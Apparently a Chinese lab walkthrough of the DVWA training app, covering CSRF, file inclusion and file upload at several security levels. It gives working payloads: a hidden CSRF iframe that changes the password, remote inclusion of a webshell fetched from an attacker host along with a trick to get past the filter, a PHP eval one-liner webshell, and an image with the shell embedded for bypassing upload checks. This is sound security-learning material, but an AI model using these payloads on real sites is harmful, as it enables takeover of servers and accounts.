链接: https://github.com/dhgdhg/DVWA-Note

  1. CSRF

    • low, medium
      • 利用
        <iframe
        style="width: 50%; height: 50%"
        src="http://192.168.119.131/DVWA/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change"
        >
        可使用style="display: none"; 来隐藏iframe
        </iframe>
        Beng!
  2. File Inclusion

    • low
      • 通过尝试可以发现 可以指定打开并运行文件, 构造 url 使用 WebShell
        • http://192.168.119.131/DVWA/vulnerabilities/fi/?page=http://192.168.119.1/b374k.txt
    • medium
      • 依旧尝试使用http://192.168.119.131/DVWA/vulnerabilities/fi/?page=http://192.168.119.1/b374k.txt却发现提示Failed opening '192.168.119.1/b374k.txt'可见是把http://给过滤了, 所以再次构造url
        • http://192.168.119.131/DVWA/vulnerabilities/fi/?page=httphttp://://192.168.119.1/b374k.txt
    • high
      • 依旧尝试使用http://192.168.119.131/DVWA/vulnerabilities/fi/?page=http://192.168.119.1/b374k.txt却发现提示ERROR: File not found!, 试试其他文件也凉凉, 最后通过尝试可知包含的文件必须是file开头的文件,so, 可以使用file协议打开本地文件, 比如https://192.168.119.131/DVWA/vulnerabilities/fi/?page=file:///opt/lampp/htdocs/DVWA/index.php
  3. File Upload

    • low
      • 上传一句话木马文件, 菜刀, 一条龙
      • beng.php
        • <?php eval($_POST["cmd"]) ?>
    • medium
      • 再次上传beng.php, 报错Your image was not uploaded. We can only accept JPEG or PNG images., emmm, 只接受jpep png, 改个后缀试试, 完犊子, 整不了, 想其他法, 通过burpsuit修改post发送数据和文件名试试
      • duang
      • 菜刀提权一条龙
    • high
      • 再试试改post数据Your image was not uploaded. We can only accept JPEG or PNG images., 我锤我自己, 再想想其他法, 凉凉, 不过!不过!不过! copy 1.jpg/b+beng.php/a 2.jpg, 生成有一句话的内涵图, 可以配合file协议搞一波File Inclusion中的high